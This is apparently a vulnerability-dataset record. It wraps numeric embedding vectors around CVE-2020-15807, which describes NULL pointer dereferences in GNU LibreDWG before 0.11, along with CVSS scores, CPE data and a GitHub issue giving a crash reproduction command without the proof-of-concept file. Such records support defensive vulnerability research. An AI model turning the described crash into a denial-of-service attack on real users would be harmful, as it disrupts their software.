0.004507569130510092, -0.00028385911718942225, -0.001978469779714942, -0.013139165006577969, -0.02556440979242325, 0.014802446588873863, -0.012599927373230457, -0.0035278277937322855, -0.01749863289296627, -0.005863257683813572, 0.006318951025605202, -0.0014980926644057035, -0.0023620116990059614, 0.0013632833724841475, -0.008931593969464302, -0.015121432021260262, 0.013997388072311878, 0.0049784523434937, 0.01528092473745346, 0.009182225912809372, -0.008384762331843376, 0.007784765679389238, -0.014453081414103508, -0.01901761256158352, -0.00849868543446064, 0.034936510026454926, 0.015463202260434628, -0.00583667540922761, -0.007610083092004061, -0.000032990315958159044, -0.011384745128452778, 0.025807447731494904, 0.0015749909216538072, 0.0033968158531934023, -0.013617643155157566, -0.00540376640856266, 0.013883464969694614, 0.0009598046308383346, -0.01021513156592846, -0.00038449146086350083, 0.0057987007312476635, -0.01251638401299715, -0.016769524663686752, -0.004241747781634331, 0.02696187049150467, 0.009189820848405361, -0.005160729866474867, 0.00991133600473404, -0.003937952220439911, 0.01529611460864544, 0.019336597993969917, 0.011544237844645977, -0.013025241903960705, 0.014491056092083454, 0.008301218040287495, -0.012683471664786339, -0.006512620951980352, -0.007845524698495865, 0.0013015748700127006, 0.02039988338947296, -0.0060189529322087765, -0.01939735747873783, -0.009979689493775368, -0.012334106490015984, 0.020961904898285866, 0.010579686611890793, -0.012189803645014763, 0.011240442283451557, -0.009531591087579727, 0.008969568647444248, 0.00005998778942739591, 0.0035202328581362963, -0.007272110320627689, -0.0010101208463311195, -0.005548069253563881, -0.014369538053870201, -0.006649328861385584, -0.017544202506542206, 0.0008055333746597171, -0.0019234067294746637, 0.0020221401937305927, -0.02565554901957512, 0.015599910169839859, -0.0304707121104002, 0.018546728417277336, 0.0019613811746239662, -0.008513875305652618, 0.0022803666070103645, -0.016253070905804634, -0.0035335239954292774, 0.008886025287210941, -0.02172139473259449, 0.008293623104691505, -0.028511228039860725, -0.00965310912579298, 0.018075846135616302, 0.011635376140475273, -0.000931798480451107, -0.010708799585700035, -0.0039455471560359, -0.013898654840886593, -0.007002491503953934, -0.003372132545337081, -0.007686031982302666, 0.01136196032166481, 0.005149337463080883, -0.026901111006736755, 0.008772101253271103, -0.016344210132956505, -0.02805553562939167, 0.009091086685657501, 0.02556440979242325, -0.03852129727602005, 0.0018768879817798734, 0.005521487444639206, -0.019032802432775497, 0.004427822772413492, -0.006618949584662914, -0.008734127506613731, -0.004424025304615498, 0.02867831662297249, 0.002035431331023574, -0.002147455932572484, 0.006884770467877388, 0.019564444199204445, 0.013321442529559135, 0.006277179345488548, -0.01236448623239994, 0.010792342945933342, -0.0004331462550908327, -0.015425227582454681, -0.000015167535821092315, 0.004237950313836336, 0.011589806526899338, -0.01689104177057743, 0.033660564571619034, -0.003649346064776182, 0.029787171632051468, -0.004348076414316893, -0.003377828747034073, -0.01483282633125782, 0.004180988762527704, -0.0036702321376651525, -0.010716394521296024, 0.012797394767403603, -0.005718954373151064, 0.0073556541465222836, 0.008635393343865871, 0.01367080770432949, -0.023164423182606697, 0.0010537913767620921, 0.0029923878610134125, -0.02383277378976345, -0.0049784523434937, 0.007465779781341553, 0.019169509410858154, 0.027812499552965164, -0.01338220201432705, -0.016663195565342903, 0.005768321454524994, 0.03533144295215607, 0.026885921135544777, 0.008582228794693947, -0.016966991126537323, -0.00835438258945942, -0.003956939559429884, -0.006664518732577562, -0.0027512500528246164, 0.013177139684557915, 0.01579737849533558, 0.014369538053870201, -0.0009939816081896424, 0.02324037253856659, 0.0057227518409490585, 0.007036668714135885, 0.021341649815440178, -0.011734110303223133, 0.009584754705429077, -0.005920219235122204, 0.005305032711476088, 0.004807567223906517, 0.013663212768733501, -0.005468322895467281, -0.004306304268538952, -0.003778459271416068, -0.007177174091339111, 0.0006393950898200274, -0.017726480960845947, -0.010177156887948513, 0.006668316200375557, -0.0025803649332374334, 0.023270752280950546, 0.0019139130599796772, -0.015964465215802193, 0.020156847313046455, 0.01514421682804823, 0.004655669443309307, 0.017529012635350227, 0.012637902051210403, 0.0007096478366293013, 0.0016841675387695432, -0.02161506563425064, -0.0034101069904863834, -0.01971634291112423, -0.005878447089344263, -0.01553155668079853, -0.0003854408278129995, 0.029635272920131683, 0.012698661535978317, -0.010321459732949734, 0.010640445165336132, 0.01006323378533125, 0.0004580669919960201, 0.019685963168740273, 0.007199958898127079, -0.022268226370215416, 0.0073556541465222836, 0.01407333742827177, 0.00905311293900013, 0.009516401216387749, -0.02222265675663948, 0.011794868856668472, -0.004936680663377047, -0.006744265090674162, 0.022101139649748802, -0.019761912524700165, -0.003007577732205391, 0.00864298827946186, 0.0013158152578398585, 0.0073442617431283, 0.008612608537077904, -0.020855575799942017, 0.010746774263679981, 0.01567585952579975, 0.00849109049886465, -0.009637919254601002, -0.010579686611890793, 0.007032871246337891, 0.009858171455562115, -0.0024797325022518635, -0.01597965508699417, -0.010123992338776588, 0.005031616892665625, 0.014004983007907867, -0.009091086685657501, -0.01543282251805067, -0.016966991126537323, -0.004180988762527704, 0.005984775722026825, -0.0034214993938803673, -0.0016499905614182353, 0.022161897271871567, 0.006151863373816013, 0.03159475699067116, -0.003749978495761752, -0.003543017664924264, -0.016465729102492332, 0.028389710932970047, 0.0044050379656255245, -0.029285907745361328, 0.004241747781634331, 0.008399952203035355, 0.011399934999644756, 0.008810075931251049, -0.02665807493031025, -0.01869862712919712, 0.021478358656167984, -0.00206391210667789, 0.0035164356231689453, 0.014772066846489906, -0.00432149413973093, 0.020065708085894585, 0.003537321463227272, 0.016875851899385452, 0.011225252412259579, -0.008825265802443027, -0.005016427021473646, -0.006341735832393169, -0.0075265392661094666, 0.010420192964375019, 0.026308709755539894, -0.03037957288324833, 0.014574600383639336, -0.007591095753014088, 0.017164457589387894, -0.002794920699670911, -0.004689846653491259, 0.0006916099810041487, -0.009599944576621056, -0.011703730560839176, -0.020688489079475403, 0.002413277281448245, 0.010754368267953396, -0.003918964881449938, 0.021250510588288307, -0.005289843305945396, 0.007127807009965181, 0.019351787865161896, -0.004818959627300501, -0.006858188658952713, 0.015417632646858692, -0.009478426538407803, -0.008589823730289936, -0.006698695942759514, 0.0072607179172337055, -0.004241747781634331, -0.028207432478666306, -0.011680945754051208, -0.014210045337677002, 0.022374555468559265, 0.019169509410858154, 0.003949344623833895, -0.02726566605269909, -0.020293554291129112, 0.006026547867804766, -0.018729006871581078, 0.009394883178174496, 0.013184734620153904, 0.021250510588288307, 0.007731601130217314, -0.01025310531258583, -0.011779678985476494, 0.0034936508163809776, 0.010875887237489223, -0.0034879546146839857, -0.0058936369605362415, -0.023164423182606697, -0.005198704544454813, 0.008468305692076683, 0.008726532571017742, -0.001556003699079156, 0.0029752994887530804, 0.007256920449435711, -0.011392340064048767, -0.011248036287724972, -0.019047992303967476, -0.01005563884973526, 0.00005366860204958357, -0.0013661313569173217, -0.013359417207539082, 0.014961939305067062, -0.03849091753363609, 0.016860662028193474, 0.009782222099602222, -0.015645479783415794, 0.004572125617414713, -0.013101190328598022, -0.004378455691039562, -0.01081512775272131, 0.020187225192785263, 0.0011145505122840405, 0.009736653417348862, -0.006478443741798401, -0.03381246328353882, 0.012303726747632027, 0.012288536876440048, 0.006721480283886194, 0.02201000042259693, -0.011164492927491665, 0.011035379953682423, -0.01337460707873106, 0.007010086439549923, -0.0023677079007029533, 0.004860731773078442, 0.0011487276060506701, -0.00023757775488775223, -0.003125298535451293, 0.02302771620452404, 0.01080753281712532, -0.012842964380979538, 0.012964482419192791, 0.011301200836896896, 0.00417719129472971, -0.002770237158983946, 0.01982267200946808, -0.012182208709418774, 0.0023753028362989426, -0.011498668231070042, -0.009691083803772926, 0.004929085727781057, -0.022511262446641922, -0.010868292301893234, 0.0005544272135011852, -0.0036151690874248743, 0.009296149015426636, -0.013063216581940651, 0.0011971450876444578, -0.005187312141060829, -0.022997336462140083, -0.006079711951315403, -0.008331597782671452, 0.0029942865949124098, 0.009007543325424194, 0.0064366720616817474, -0.006246799603104591, 0.006827808916568756, 0.0011012594914063811, -0.0033056773245334625, 0.005965788383036852, -0.006254394538700581, 0.009334123693406582, 0.0021987215150147676, 0.00034675432834774256, 0.007591095753014088, -0.009767032228410244, 0.016966991126537323, -0.01790875755250454, -0.026080863550305367, 0.023878343403339386, -0.009136656299233437, -0.013503720052540302, -0.008073371835052967, -0.01096702553331852, 0.0228454377502203, -0.009318933822214603, 0.0007742044399492443, -0.004275924991816282, -0.0016642309492453933, 0.010222726501524448, 0.020855575799942017, -0.002895552897825837, 0.0016775219701230526, -0.008939188905060291, -0.005741739179939032, -0.013807515613734722, 0.028982112184166908, -0.006178445648401976, 0.007006288971751928, 0.011088543571531773, -0.03066817857325077, 0.00004079288191860542, 0.0024493529926985502, -0.007272110320627689, 0.012994862161576748, -0.001348093501292169, 0.006106294225901365, 0.00633414089679718, -0.004963262472301722, 0.0017904960550367832, 0.013883464969694614, 0.012660686857998371, 0.014407512731850147, 0.001303473487496376, 0.014567005448043346, -0.0013832199620082974, -0.0018740398809313774, 0.006318951025605202, -0.005639208015054464, 0.013329037465155125, -0.0010718293488025665, 0.0009246782283298671, 0.009645514190196991, -0.0007196161313913763, 0.016116363927721977, -0.0018939764704555273, 0.01468092855066061, -0.01251638401299715, -0.012539168819785118, -0.009782222099602222, -0.009144251234829426, -0.010860697366297245, -0.004241747781634331, -0.004799972288310528, 0.012561953626573086, 0.018455591052770615, 0.009129061363637447, -0.005005034618079662, -0.011005000211298466, 0.003113906132057309, -0.0065012285485863686, 0.0019461914198473096, -0.01789356768131256, -0.022708730772137642, -0.028101105242967606, -0.0022499870974570513, 0.004784782882779837, -0.005517689976841211, -0.01367840263992548, -0.002035431331023574, -0.02053659036755562, -0.008248054422438145, -0.016739144921302795, 0.028207432478666306, 0.02626314014196396, -0.0033968158531934023, 0.007758183404803276, 0.001465814420953393, 0.012713851407170296, -0.03578713536262512, 0.011893603019416332, -0.01962520368397236, 0.017923947423696518, 0.008969568647444248, -0.022556832060217857, -0.0004984148545190692, -0.0007314831600524485, -0.006592367310076952, -0.01889609359204769, -0.002595554804429412, -0.005468322895467281, 0.028936542570590973, 0.020460642874240875, 0.01081512775272131, -0.003442385233938694, 0.00699109910055995, -0.009296149015426636, 0.01789356768131256, 0.0007395527209155262, -0.0017439773073419929, 0.00482655456289649, 0.003918964881449938, 0.0035278277937322855, 0.0029031478334218264, 0.01353409979492426, 0.01910875178873539, 0.008293623104691505, 0.036455485969781876, -0.010374624282121658, 0.010526522062718868, -0.017620151862502098, -0.00357149844057858, 0.005745536647737026, 0.019974568858742714, 0.006349330767989159, 0.015174596570432186, -0.012448029592633247, -0.0002534795494284481, 0.011187277734279633, -0.004443012643605471, -0.008308812975883484, -0.016951801255345345, -0.006603759713470936, -0.011946766637265682, -0.0001546272833365947, -0.014088526368141174, -0.007997422479093075, -0.01830369234085083, -0.00006615863821934909, -0.025989724323153496, 0.011604996398091316, 0.014316373504698277, 0.0038525096606463194, -0.0060645220801234245, 0.02775174006819725, 0.04447569325566292, 0.002183531876653433, -0.004446810111403465, -0.00810375064611435, 0.020855575799942017, -0.00819488987326622, 0.014802446588873863, -0.024501124396920204, -0.0035525113344192505, 0.004040483385324478, 0.005077186040580273, -0.008977163583040237, -0.008027802221477032, -0.0031082099303603172, 0.013936628587543964, 0.017878377810120583, 0.010222726501524448, 0.001353789702989161, 0.022708730772137642, 0.02222265675663948, 0.014506245963275433, 0.011035379953682423, -0.004655669443309307, 0.005225286353379488, -0.006763252429664135, 0.003626561490818858, 0.0030797291547060013, -0.008316407911479473, 0.02936185710132122, 0.03347828984260559, 0.002113278955221176, 0.003043653443455696, 0.007822739891707897, -0.015455607324838638, -0.010701204650104046, 0.014475866220891476, -0.002906945301219821, -0.000032515636121388525, 0.019260648638010025, -0.009683488868176937, 0.00034319423139095306, -0.0019186598947271705, 0.0077733732759952545, 0.002301252679899335, 0.014939154498279095, 0.0058746496215462685, -0.008027802221477032, 0.00003907216523657553, -0.015068268403410912, 0.014749282039701939, 0.006691101007163525, 0.0014173969393596053, 0.01151385810226202, -0.021280890330672264, 0.02053659036755562, 0.03812636435031891, -0.0015142317861318588, 0.0022803666070103645, -0.01035943441092968, 0.015751808881759644, -0.02070367895066738, -0.025063147768378258, 0.027387185022234917, -0.0060379402711987495, 0.013291062787175179, 0.002234797226265073, -0.012774609960615635, -0.010313864797353745, -0.005502500105649233, 0.001244613085873425, 0.0038582056295126677, 0.01608598418533802, 0.006934137549251318, -0.021478358656167984, 0.02975679188966751, 0.008126535452902317, -0.030030207708477974, 0.006049332208931446, 0.009698678739368916, 0.007048060651868582, 0.0010575888445600867, 0.0008629697258584201, -0.0009711969760246575, 0.0008605963084846735, 0.002906945301219821, -0.006554392632097006, -0.004180988762527704, -0.02342265099287033, -0.01708851009607315, -0.023407461121678352, -0.023407461121678352, -0.0010898672044277191, 0.001768660731613636, 0.005415158811956644, 0.019731532782316208, -0.008665773086249828, 0.001824673032388091, 0.01136196032166481, -0.0008150269859470427, 0.012592332437634468, -0.010534116998314857, -0.012858154252171516, 0.007048060651868582, -0.017559392377734184, 0.015554341487586498, 0.011946766637265682, 0.008210079744458199, -0.00714299688115716, 0.005806295666843653, -0.0030455521773546934, 0.021341649815440178, -0.01468092855066061, -0.0030056789983063936, 0.0024208722170442343, -0.0034936508163809776, 0.009394883178174496, 0.01221258845180273, 0.0013414480490610003, 0.018972042948007584, 0.024501124396920204, 0.015615100041031837, -0.02825300209224224, -0.01831888221204281, 0.004443012643605471, 0.0034290943294763565, -0.003402512054890394, -0.02163025550544262, -0.007226540707051754, 0.003926559817045927, -0.0019072674913331866, -0.0023923914413899183, 0.00010781188029795885, -0.006083509419113398, -0.0068429987877607346, 0.004260735120624304, -0.0031708679161965847, -0.006949327420443296, 0.019959378987550735, 0.0012588535901159048, 0.007742993533611298, 0.0016575853805989027, -0.014141690917313099, -0.001978469779714942, -0.009075897745788097, 0.018561918288469315, -0.022966956719756126, -0.014567005448043346, -0.03208082914352417, 0.006987301632761955, 0.0198074821382761, 0.01690623164176941, -0.03311373293399811, 0.019746722653508186, -0.004086052533239126, -0.012934102676808834, 0.00424934271723032, 0.0029031478334218264, 0.014620169065892696, 0.027326425537467003, -0.009463236667215824, 0.024379607290029526, 0.008870835416018963, 0.0152353560552001, 0.013473340310156345, -0.025108717381954193, 0.0016832181718200445, -0.02907325141131878, 0.003195551224052906, -0.001721192616969347, -0.003554410068318248, -0.019777102395892143, 0.013055621646344662, -0.030850455164909363, -0.0018056858098134398, 0.003043653443455696, 0.023194802924990654, 0.013959413394331932, 0.007150591816753149, 0.00039778253994882107, -0.004002508707344532, -0.016723955050110817, 0.010670824907720089, 0.005654397886246443, -0.010344244539737701, 0.001277840812690556, 0.010329054668545723, 0.004010103642940521, -0.005175919737666845, -0.009622729383409023, 0.055078163743019104, 0.0012692965101450682, 0.027296045795083046, -0.010093612596392632, -0.015918895602226257, -0.0026753011625260115, -0.018653057515621185, -0.016116363927721977, -0.01051133219152689, 0.014255614019930363, 0.01801508665084839, -0.0063607231713831425, 0.0055822464637458324, -0.004131621681153774, 0.00388478790409863, -0.010237916372716427, -0.006106294225901365, 0.00006485326593974605, 0.001362334005534649, -0.0106632299721241, -0.02002013847231865, 0.012698661535978317, 0.03265804052352905, -0.011073354631662369, 0.013146759942173958, -0.006497431080788374, -0.008377167396247387, 0.0011477782391011715, 0.006736670155078173, -0.005346804857254028, 0.023194802924990654, -0.017027750611305237, 0.011597401462495327, -0.003934154752641916, 0.015736619010567665, 0.0023734041023999453, 0.010526522062718868, 0.017878377810120583, 0.002111380221322179, -0.018865713849663734, 0.029498564079403877, 0.009767032228410244, -0.005434146150946617, 0.0057531315833330154, 0.005187312141060829, -0.0073556541465222836, -0.004777187947183847, -0.0023145435843616724, 0.014597384259104729, 0.023513788357377052, 0.02122013084590435, 0.008680962957441807, 0.0078910943120718, -0.003112007398158312, -0.002306948881596327, -0.012189803645014763, -0.012599927373230457, -0.003529726527631283, -0.0056278156116604805, -0.01851634867489338, -0.005665790289640427, -0.014156880788505077, -0.006539203226566315, -0.01358726341277361, -0.022070759907364845, -0.0027379589155316353, -0.018637867644429207, 0.012729041278362274, -0.017027750611305237, 0.025199854746460915, 0.019883429631590843, 0.0025120109785348177, -0.0034765624441206455, -0.00494807306677103, -0.014825231395661831, -0.0025063147768378258, 0.012303726747632027, -0.022891007363796234, 0.012455624528229237, -0.003953142091631889, -0.01878976635634899, -0.008787291124463081, -0.0003655042382888496, -0.006337938364595175, 0.026688454672694206, 0.0020259376615285873, -0.0009768931195139885, 0.001280688913539052, -0.0227391105145216, 0.016632815822958946, 0.01096702553331852, -0.00895437877625227, -0.02172139473259449, -0.008225269615650177, 0.012129044160246849, -0.006896162871271372, -0.019685963168740273, -0.012296131812036037, -0.009729058481752872, 0.0012987267691642046, 0.0011506263399496675, 0.0046518719755113125, -0.007739196065813303, -0.010868292301893234, -0.0029563121497631073, -0.0009223048109561205, 0.01699737086892128, -0.011232847347855568, -0.0040366859175264835, 0.00904551800340414, -0.0008188243955373764, -0.014187260530889034, -0.020172035321593285, 0.00043148486292921007, 0.016632815822958946, 0.0343896746635437, 0.001863596960902214, -0.008369572460651398, 0.0007874954608269036, 0.007564513478428125, -0.012637902051210403, -0.008453115820884705, 0.026020104065537453, 0.022101139649748802, 0.0026221368461847305, -0.002248088363558054, -0.0017135977977886796, 0.02986311912536621, -0.002166443271562457, 0.00795185286551714, 0.004332886543124914, -0.01658724620938301, 0.018166983500123024, 0.009060707874596119, 0.005950598977506161, 0.011164492927491665, -0.007169579155743122, 0.012584737502038479, 0.0134353656321764, -0.003385423682630062, -0.002652516355738044, 0.05431867763400078, 0.003994913771748543, -0.002597453538328409, -0.011680945754051208, 0.003637953894212842, 0.004408835433423519, -0.0018398629035800695, -0.0029923878610134125, -0.02785806730389595, 0.031002353876829147, 0.004218962974846363, -0.000029445045583997853, -0.0015873326919972897, 0.0013784731272608042, 0.007784765679389238, 0.009159441106021404, 0.004348076414316893, -0.026992250233888626, 0.008149320259690285, 0.0033360568340867758, 0.021037854254245758, 0.0001871429121820256, -0.0009455641848035157, 0.010237916372716427, 0.007913879118859768, -0.01282017957419157, -0.006448064465075731, 0.022177087143063545, -0.011301200836896896, -0.03006058745086193, -0.011149303056299686, -0.006345533300191164, -0.004029090981930494, 0.0006930339732207358, 0.005863257683813572, 0.013549289666116238, 0.00502781942486763, 0.0018208756810054183, 0.015918895602226257, 0.022085949778556824, 0.00865058321505785, -0.013746757060289383, 0.019336597993969917, 0.023270752280950546, -0.020460642874240875, -0.02413657121360302, 0.0023164423182606697, 0.00761767802760005, -0.0010879684705287218, -0.0025822636671364307, -0.013655617833137512, 0.013480935245752335, -0.0016376487910747528, 0.006880973000079393, 0.01989861950278282, 0.02814667485654354, -0.006448064465075731, 0.036455485969781876, -0.006186040583997965, 0.004131621681153774, -0.007967042736709118, -0.01939735747873783, 0.013503720052540302 ]
217
CVE-2020-15807
2020-07-17T16:15:11.560000
GNU LibreDWG before 0.11 allows NULL pointer dereferences via crafted input files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/186" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/189" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/190" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "581DFE64-B504-4D86-AAAA-33836C432C53", "versionEndExcluding": "0.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/189
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, I got some bugs which you can reproduce `dxf2dwg $PoC -o /dev/null` .Thses bugs work on version `0.10.1.2685` and `earlier`.
Some NULL pointer bugs
https://api.github.com/repos/LibreDWG/libredwg/issues/189/comments
58
2020-01-16T11:36:57
2020-07-20T02:15:32Z
https://github.com/LibreDWG/libredwg/issues/189
550,751,408
189
true
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Some NULL pointer bugs Issue date: --- start body --- Hi, I got some bugs which you can reproduce `dxf2dwg $PoC -o /dev/null` .Thses bugs work on version `0.10.1.2685` and `earlier`. --- end body ---
261
[ -0.019228843972086906, 0.0022935024462640285, -0.003428123891353607, 0.02691739611327648, 0.047863103449344635, 0.03436708077788353, -0.020781483501195908, 0.04233928769826889, -0.002931727096438408, 0.005934367887675762, -0.008860496804118156, -0.0016263526631519198, -0.0015339781530201435, 0.0003219114732928574, -0.011323818936944008, 0.02305072732269764, -0.002868277719244361, 0.016571441665291786, -0.02209525555372238, -0.026096289977431297, 0.01697453111410141, -0.014123048633337021, -0.015810051932930946, 0.03215755522251129, -0.02278200164437294, -0.014115584082901478, -0.025006456300616264, -0.01719846948981285, 0.001032915897667408, 0.010958053171634674, 0.005811201874166727, 0.0016226203879341483, 0.01201802771538496, 0.025603624060750008, 0.0372932106256485, -0.011995634064078331, 0.01586976833641529, 0.05392437055706978, 0.005057275760918856, 0.03281444311141968, -0.010286238044500351, -0.056074175983667374, -0.026753176003694534, 0.003862937679514289, -0.019273633137345314, 0.0020602333825081587, 0.027887796983122826, 0.026439661160111427, -0.019079552963376045, 0.00009674839384388179, 0.01557118445634842, -0.0033982654567807913, -0.019243773072957993, -0.08181216567754745, 0.025051243603229523, -0.022050468251109123, 0.012010563164949417, 0.012443510815501213, -0.0036054083611816168, -0.005206568166613579, -0.017332833260297775, 0.038935426622629166, 0.005299875512719154, 0.015750335529446602, -0.014682895503938198, 0.03126180171966553, -0.05926903337240219, 0.014735147356987, -0.011152132414281368, 0.00543050654232502, 0.012025492265820503, -0.01697453111410141, -0.008793314918875694, 0.01086101308465004, 0.023946480825543404, -0.04899772256612778, 0.013585597276687622, 0.0229312926530838, -0.009554705582559109, 0.004426515661180019, -0.017138753086328506, 0.03860698267817497, -0.026260510087013245, 0.002254313323646784, 0.0026032840833067894, -0.013637849129736423, -0.01179408933967352, -0.07787085324525833, 0.003922654315829277, -0.025842491537332535, -0.004844534210860729, 0.03087364137172699, -0.009726391173899174, -0.01501880306750536, 0.026096289977431297, -0.03887570649385452, -0.025812633335590363, -0.021065140143036842, -0.043951645493507385, -0.02799230068922043, -0.026379944756627083, 0.0056656417436897755, -0.0011859404621645808, 0.027559353038668633, 0.01365277823060751, 0.04135395959019661, 0.015406962484121323, -0.005796272307634354, -0.007378770504146814, 0.09715940803289413, 0.028484966605901718, -0.015735406428575516, -0.04195112735033035, -0.01002497598528862, -0.00728173041716218, 0.016735663637518883, 0.023856904357671738, -0.035979438573122025, -0.035561420023441315, -0.01704917848110199, -0.020706837996840477, -0.03771122917532921, -0.009935400448739529, -0.004728832747787237, -0.03144095093011856, 0.01776578091084957, -0.025603624060750008, -0.010122016072273254, -0.0338594876229763, 0.006576324813067913, -0.018288303166627884, -0.023379169404506683, 0.011062557809054852, -0.007472078315913677, 0.014735147356987, 0.009726391173899174, -0.03162010386586189, 0.04263787344098091, 0.009084435179829597, -0.014914298430085182, -0.06777869164943695, -0.07452670484781265, 0.019542358815670013, -0.03469552472233772, -0.05207314342260361, -0.010390741750597954, -0.04024919494986534, -0.007162296678870916, 0.00047866834211163223, -0.005363325122743845, -0.03953259438276291, -0.035710711032152176, 0.022319193929433823, 0.018542099744081497, 0.04669862240552902, -0.012637590989470482, 0.0052588204853236675, 0.03669603914022446, -0.015899626538157463, -0.02449886128306389, 0.019273633137345314, -0.019617004320025444, 0.026484448462724686, -0.04108523204922676, -0.05228215456008911, -0.015556254424154758, 0.02741006202995777, 0.02858947031199932, -0.030321260914206505, 0.020706837996840477, -0.015003873035311699, -0.013645313680171967, 0.0042510973289608955, 0.004456374328583479, -0.04669862240552902, -0.004542217589914799, -0.03018689714372158, 0.011958311311900616, -0.018124081194400787, -0.015272599644958973, 0.00540064787492156, -0.0043854606337845325, -0.022991010919213295, -0.003575549926608801, 0.01943785324692726, -0.001574100460857153, 0.04514598473906517, -0.013846858404576778, -0.00975625030696392, -0.030993076041340828, 0.0028141592629253864, -0.014003614895045757, -0.009368089959025383, -0.02585742250084877, 0.0025808901991695166, -0.012898852117359638, -0.04096579924225807, -0.03353104367852211, 0.005900776945054531, -0.023020869120955467, 0.020020093768835068, 0.013436304405331612, 0.009136687032878399, -0.00856191199272871, 0.006363583263009787, 0.007483275141566992, -0.008935142308473587, 0.037681370973587036, 0.007128706201910973, -0.015362175181508064, 0.013085467740893364, -0.023573249578475952, 0.0132347596809268, 0.0004175518115516752, -0.04009990394115448, 0.004754958674311638, 0.004542217589914799, 0.028574541211128235, -0.02905227616429329, -0.014570925384759903, 0.024021126329898834, -0.01860181801021099, 0.0049079833552241325, -0.011958311311900616, -0.07727368175983429, -0.01951250061392784, 0.01391404028981924, 0.006087392568588257, -0.05714908242225647, 0.005072204861789942, 0.03538226708769798, -0.052341870963573456, 0.02251327410340309, 0.010226520709693432, -0.031231943517923355, 0.0015890296781435609, 0.015123307704925537, -0.010943124070763588, -0.016884956508874893, -0.004557146690785885, 0.025767846032977104, 0.04007004573941231, -0.010256378911435604, -0.02069190889596939, 0.02915678173303604, 0.008046853356063366, -0.00378269306384027, -0.007375038228929043, -0.0014891903847455978, 0.0241107027977705, -0.0017961726989597082, -0.021781742572784424, 0.025409545749425888, 0.013817000202834606, 0.009144151583313942, -0.0044601066038012505, 0.03466566652059555, 0.056492194533348083, -0.026141077280044556, -0.023185089230537415, 0.012697307392954826, 0.000005423508355306694, -0.03242628276348114, 0.019154198467731476, -0.002916797762736678, 0.003933851607143879, -0.028873125091195107, 0.007905025966465473, -0.025424474850296974, -0.009562170132994652, 0.011301425285637379, -0.02199075184762478, -0.010144409723579884, -0.0040271589532494545, -0.02415549010038376, -0.00028808743809349835, 0.0232000183314085, -0.006557662971317768, 0.01420515961945057, 0.003631534520536661, 0.0012820473639294505, 0.006516607943922281, -0.02300594002008438, 0.02939564920961857, 0.02391662262380123, -0.0106893265619874, -0.017915071919560432, -0.005135654006153345, -0.017900142818689346, 0.012906316667795181, -0.001054376713000238, 0.015347246080636978, -0.030097322538495064, -0.013817000202834606, 0.009293444454669952, 0.029067205265164375, 0.021856388077139854, -0.019318420439958572, -0.024483932182192802, -0.0006344921421259642, -0.009039646945893764, 0.009786108508706093, 0.01230168342590332, -0.007964742369949818, -0.020751625299453735, 0.007098847534507513, 0.008091641589999199, 0.001935201114974916, -0.011181991547346115, -0.011592544615268707, 0.014212624169886112, -0.053894512355327606, -0.004232435952872038, -0.027395132929086685, -0.009263585321605206, -0.02369268424808979, -0.005072204861789942, -0.03302345052361488, -0.005979155655950308, 0.021020352840423584, -0.02699204348027706, -0.012659984640777111, -0.03812924772500992, 0.018706321716308594, 0.05174470320343971, -0.033769913017749786, -0.0013035081792622805, 0.03884584829211235, -0.0740489661693573, 0.014936692081391811, 0.0195572879165411, -0.019243773072957993, -0.04236914590001106, -0.0066472385078668594, -0.002636874793097377, -0.04899772256612778, -0.021124856546521187, -0.030843783169984818, 0.005994084756821394, -0.019034765660762787, -0.01852717064321041, 0.02703683078289032, 0.0114133944734931, -0.02457350865006447, 0.00034453856642358005, -0.030321260914206505, 0.003204185515642166, -0.010540034621953964, 0.007296659983694553, 0.0192885622382164, 0.0008756924653425813, 0.04502654820680618, -0.021050211042165756, 0.014018543995916843, 0.015421891584992409, -0.02939564920961857, 0.006251614075154066, -0.018766038119792938, 0.009151616133749485, -0.00905457604676485, 0.01852717064321041, -0.020856130868196487, 0.01758662983775139, 0.020527686923742294, -0.0024073380045592785, 0.008539518341422081, 0.015287528745830059, 0.0069532874040305614, -0.0320381224155426, -0.0017504518618807197, -0.0058895801194012165, 0.05001291260123253, -0.01766127534210682, -0.017034247517585754, -0.014697824604809284, -0.012204643338918686, 0.04944559931755066, 0.017288045957684517, -0.031082650646567345, 0.006042604800313711, -0.04132410138845444, -0.029724091291427612, -0.0038013544399291277, -0.04711664095520973, 0.034874673932790756, 0.03672589734196663, -0.018855614587664604, 0.035830143839120865, 0.00003942249168176204, -0.03574056923389435, -0.011159596964716911, 0.04741522669792175, -0.006736814044415951, -0.02376732975244522, 0.009562170132994652, 0.06939104944467545, -0.0005393183091655374, 